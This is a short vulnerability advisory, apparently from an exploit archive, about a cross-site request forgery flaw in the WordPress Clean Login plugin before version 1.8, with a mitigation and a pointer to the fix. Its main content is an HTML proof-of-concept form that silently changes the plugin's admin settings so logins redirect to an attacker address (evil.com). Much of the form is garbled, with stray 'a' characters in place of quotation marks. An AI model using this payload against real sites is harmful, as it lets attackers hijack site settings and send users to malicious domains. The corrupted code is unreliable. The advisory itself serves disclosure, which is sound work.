WordPress Clean Login Cross Site Request Forgery

WordPress Clean Login plugin versions prior to 1.8 suffer from a cross site request forgery vulnerability.


MD5 | d394c043b0c71f8bc31e0732dcfb0921

===============

Software Description

===============

Software:clean login

version:<1.8

description:Responsive Frontend Login and Registration plugin.


========

Details

========

CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.


========

POC:

========

<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">

<input type="text" name= "adminbar" value=aon">

a<input type="text" name="emailnotificationcontent" value="">
a<input type="text" name="termsconditionsMSG" value="">
a<input type="text" name="termsconditionsURL" value="">
a<input type="text" name="urlredirect" value=ahttp://127.0.0.1/wordpressa>
a<input type=atexta name="loginredirecta value=aona>
a<input type=atexta name="loginredirect_urla value="http://evil.coma>
a<input type=atexta name="logoutredirect_urla value="http://127.0.0.1/wordpressa>
a<input type=atexta name="cl_hidden_fielda value="hidden_field_to_update_othersa>
a<input type=atexta name="Submita value="Save Changesa>
<input type="submita>

</form>


=========

Mitigations

================

Disable the plugin until a new version is released that fixes this bug.


=========

Fixed

=========

https://wordpress.org/plugins/clean-login/#developers(1.8 version update)





Related Posts

Comments